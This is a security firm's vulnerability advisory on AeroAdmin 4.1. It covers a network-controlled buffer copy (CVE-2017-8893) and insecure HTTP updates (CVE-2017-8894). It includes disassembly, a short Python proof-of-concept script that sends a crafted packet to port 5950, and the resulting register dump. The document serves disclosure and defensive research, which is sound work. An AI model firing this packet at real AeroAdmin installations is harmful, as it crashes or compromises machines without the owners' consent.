Cybersecurity blog header

AeroAdmin 4.1 Vulnerability – CVE-2017-8893 CVE-2017-8894

Tarlogic Advisory: Tarlogic-2017-001
Title: Multiple vulnerabilities found in AeroAdmin 4.1 software.
Discovered by: Juan Manuel Fernandez (@TheXC3LL)
CWE-ID: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

AeroAdmin Vulnerability – CVE-2017-889

Advisory.vulnerabilities reported by Tarlogic
AeroAdmin 4.1 uses a function to copy data between two pointers where the size of the data copied is taken directly from a network packet. This vulnerability have been reported as CVE-2017-8893.

005301B0 push edi
005301B1 push esi
005301B2 mov esi, ORIGEN
005301B6 mov ecx, SIZE
005301BA mov edi, DESTINO
005301BE mov eax, ecx
005301C0 mov edx, ecx
005301C2 add eax, esi
005301C4 cmp edi, esi
005301C6 jbe short loc_005

(…)

005301FE rep movsb ; Crash
00530200 mov eax, [esp+8+DESTINO]
00530204 pop esi
00530205 pop edi
00530206 retn

We can control “SIZE” variable, so the ECX register used for “rep movsb” has an arbitrary value at this point. Set a breakpoint at rep mosvb address and test it:

#Proof of concept

import socket
import signal
import sys

target_IP =’192.168.245.206′ #Change as needed
target_port = 5950

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (target_IP, target_port)
sock.connect(server_address)
packet1 = “040000000037130000”.decode(“hex”) # <– will be the value used as size (3713 –> 1337)
print “[+] Sent:\n ” + packet1.encode(“hex”)
sock.send(packet1)
sock.close()

#EoF

—>

EAX 002B3350
ECX 00133700 <– Number of bytes that are going to be copied
EDX 00133700
EBX 0017FAD0
ESP 0137F6C8
EBP 0137F6EC
ESI 0017FC50
EDI 01DE0040

<—

Aeroadmin 4.1 CVE-2017-8894

AeroAdmin 4.1 uses an insecure protocol (HTTP) to perform software updates.
An attacker can hijack an update via man-in-the-middle in order to execute code in the machine.

Discover our work and cybersecurity services.

Leave a comment